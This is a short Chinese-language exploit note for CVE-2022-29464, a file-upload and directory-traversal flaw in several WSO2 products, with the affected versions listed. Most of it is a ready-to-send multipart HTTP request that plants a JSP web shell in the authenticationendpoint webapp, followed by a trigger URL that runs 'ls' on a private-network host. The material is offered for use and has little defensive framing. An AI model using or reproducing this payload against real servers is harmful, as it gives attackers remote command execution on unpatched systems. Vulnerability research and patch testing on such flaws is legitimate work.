(CVE-2022-29464)
WSO2 文件上传漏洞(CVE-2022-29464)
WSO2是一家成立于 2005 年的开源技术提供商。它提供一个企业平台,用于在本地和整个 Internet 上 集成应用程序编程接口(API)、应用程序和 Web 服务。 某些 WSO2 产品允许无限制的文件上传和远程代码执行。攻击者必须使用带有 Content-Disposition 目录遍历序列的/fileupload端点来到达Web 根目录下的目录,如 ../../../../repository/deployment/server/webapps 目录。这会影响 WSO2 API Manager 2.2.0 及更高版本到 4.0.0;WSO2 Identity Server 5.2.0 及以上至 5.11.0;WSO2 身份服务器分析 5.4.0、5.4.1、5.5.0 和 5.6.0;WSO2 身份服务器作为密钥管理器 5.3.0 及更高版本至 5.10.0;和 WSO2 Enterprise Integrator 6.2.0 及更高版本至 6.6.0。




url:
User-Agent: python-requests/2.22.0
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"
<FORM><INPUT name='cmd' type=text><INPUT type=submit value='Run'></FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");String output = "";
if(cmd != null) {String s = null;
try {Process p = Runtime.getRuntime().exec(cmd,null,null);BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; } } catch(IOException e) { e.printStackTrace(); } }
%><pre><%=output %></pre>
--4ef9f369a86bfaadf5ec3177278d49c0--

payload:https://192.168.85.130:24377/authenticationendpoint/1.jsp?cmd=ls

